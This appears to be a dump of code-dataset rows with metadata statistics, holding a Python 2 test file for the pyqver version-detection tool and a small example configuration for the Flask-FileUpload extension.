| 31.313725 | 96 | 0.7201 | 186 | 1,597 | 6.096774 | 0.387097 | 0.037037 | 0.135802 | 0.185185 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010204 | 0.202254 | 1,597 | 50 | 97 | 31.94 | 0.879906 | 0.407639 | 0 | 0 | 0 | 0 | 0.015642 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.041667 | false | 0 | 0.291667 | 0 | 0.791667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
0ab64f30409c1028f80ac4063d29d92dfddf82b9 | 4,140 | py | Python | tests/pyqver_tests.py | cnsnyder/pyqver | d33351804b58752c4d9fef63225e1b8362c1cdaf | [
"Zlib"
] | null | null | null | tests/pyqver_tests.py | cnsnyder/pyqver | d33351804b58752c4d9fef63225e1b8362c1cdaf | [
"Zlib"
] | null | null | null | tests/pyqver_tests.py | cnsnyder/pyqver | d33351804b58752c4d9fef63225e1b8362c1cdaf | [
"Zlib"
] | null | null | null |
# multiple with statement (2, 7(
# from __future__ import with_statement
try:
import argparse
except ImportError, e:
pass
try:
import argparse
except (ImportError, KeyError) as e:
pass
try:
import argparse
except ImportError as e:
pass
finally:
print 'pass'
print "hello world" # 2.0
# nested try/except/finally ok for (2, 0)
try:
try:
pass
except:
pass
finally:
pass
# new style classes
class test(object):
pass # (2, 2)
# yield statement
def yielder():
for x in [1, 2, 3]:
yield 1 # (2.2)
# yes, lets add a fundamental type in a .2
print True # (2, 2)
a = 4
b = 9
c = 8
a = 100 + c // b - 1
# floordiv
print a // b # (2, 2)
a_list = [12.3, 4, 4.0]
# enumerate
enumerate(a_list) # (2, 3)
sum(a_list) # (2, 3)
# comprenension
(x * x for x in range(5)) # (2, 4)
# @classmethod
class C:
@classmethod # (2,4)
def m():
pass
rev = reversed([1, 2, 3, 4]) # (2, 4)
import subprocess
a = subprocess.check_output(['ls'])
x = 0
z = False
y if x else z # (2,5)
# hashlib
import hashlib # (2, 5)
from hashlib import md5 # (2,5)
# ElementTree
import xml.etree.ElementTree # (2,5)
# try/finally # 2.5?
try:
pass
except:
pass
finally:
pass
class cm(object):
def __enter__(self):
pass
def __exit__(self, *args):
pass
# future with statement (2, 5)
with cm():
pass
# ssl in 2.6
import ssl # (2,6)
# WatchedFileHandler added in 2.6
try:
from logging.handlers import WatchedFileHandler
except ImportError:
raise
# new 2.7 modules
try:
# argparse in 2.7
import argparse as not_optparse # (2.7)
# collections.Counter new in 2.7
from collections import Counter
# collections.OrderedDict new in 2.7
from collections import OrderedDict
# NullHandler added in 2.7
from logging import NullHandler
import logging
foo = logging.NullHandler
except ImportError:
pass
# pep 378, ',' format specifier for thousans
foo = '{:20,.2f}'.format(18446744073709551616.0)
bar = '{:20,d}'.format(18446744073709551616)
blip = '{0},{1}'.format('sdfadf', 'sfsdfsdfserer')
# multiple with statement (2, 7(
with cm():
pass
with cm(): # (2, 5)
pass
pass
# some py3+ modules
try:
import faulthandler # (3,3)
import ipaddress # (3,3)
import lzma
import tkinter.ttk
import unittest.mock
import venv
except ImportError as e:
print e
# some py3 functions
try:
import bz2
f = bz2.open('/sdfd')
except Exception as e:
print e
"""
>>> qver('print "hello world"')
(2, 0)
>>> qver('class test(object): pass')
(2, 2)
>>> qver('yield 1')
(2, 2)
>>> qver('a // b')
(2, 2)
>>> qver('True')
(2, 2)
>>> qver('enumerate(a)')
(2, 3)
>>> qver('total = sum')
(2, 0)
>>> qver('sum(a)')
(2, 3)
>>> qver('(x*x for x in range(5))')
(2, 4)
>>> qver('class C:\\n @classmethod\\n def m(): pass')
(2, 4)
>>> qver('y if x else z')
(2, 5)
>>> qver('import hashlib')
(2, 5)
>>> qver('from hashlib import md5')
(2, 5)
>>> qver('import xml.etree.ElementTree')
(2, 5)
>>> qver('try:\\n try: pass;\\n except: pass;\\nfinally: pass')
(2, 0)
>>> qver('try: pass;\\nexcept: pass;\\nfinally: pass')
(2, 5)
>>> qver('from __future__ import with_statement\\nwith x: pass')
(2, 5)
>>> qver('collections.defaultdict(list)')
(2, 5)
>>> qver('from collections import defaultdict')
(2, 5)
>>> qver('"{0}".format(0)')
(2, 6)
>>> qver('memoryview(x)')
(2, 7)
>>> v27('{1, 2, 3}')
(2, 7)
>>> v27('{x for x in s}')
(2, 7)
>>> v27('{x: y for x in s}')
(2, 7)
>>> qver('from __future__ import with_statement\\nwith x:\\n with y: pass')
(2, 5)
>>> v27('from __future__ import with_statement\\nwith x, y: pass')
(2, 7)
>>> qver('@decorator\\ndef f(): pass')
(2, 4)
>>> qver('@decorator\\nclass test:\\n pass')
(2, 6)
#>>> qver('0o0')
#(2, 6)
#>>> qver('@foo\\nclass C: pass')
#(2, 6)
"""
| 17.76824 | 79 | 0.55628 | 598 | 4,140 | 3.795987 | 0.232441 | 0.014097 | 0.021145 | 0.035242 | 0.289868 | 0.226872 | 0.132599 | 0.048458 | 0.014097 | 0 | 0 | 0.073138 | 0.27343 | 4,140 | 232 | 80 | 17.844828 | 0.681516 | 0.167874 | 0 | 0.454545 | 0 | 0 | 0.034726 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.191919 | 0.272727 | null | null | 0.060606 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
0ac3bbab22bebebe7a38116d55bf9ab299be07cc | 231 | py | Python | example/config.py | platform-ai/Flask-FileUpload | 77b26729a114a11820f69372dae30590c13f4a69 | [
"MIT"
] | 20 | 2017-04-27T09:11:42.000Z | 2022-01-19T06:38:50.000Z | example/config.py | platform-ai/Flask-FileUpload | 77b26729a114a11820f69372dae30590c13f4a69 | [
"MIT"
] | 9 | 2017-05-07T03:51:55.000Z | 2018-12-01T15:43:09.000Z | example/config.py | platform-ai/Flask-FileUpload | 77b26729a114a11820f69372dae30590c13f4a69 | [
"MIT"
] | 6 | 2017-05-21T13:42:27.000Z | 2022-01-19T06:38:51.000Z | SECRET_KEY = "abc"
FILEUPLOAD_ALLOWED_EXTENSIONS = ["png"]
# FILEUPLOAD_PREFIX = "/cool/upload"
# FILEUPLOAD_LOCALSTORAGE_IMG_FOLDER = "images/boring/"
FILEUPLOAD_RANDOM_FILE_APPENDIX = True
FILEUPLOAD_CONVERT_TO_SNAKE_CASE = True
| 33 | 55 | 0.818182 | 28 | 231 | 6.25 | 0.821429 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.08658 | 231 | 6 | 56 | 38.5 | 0.829384 | 0.380952 | 0 | 0 | 0 | 0 | 0.042857 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.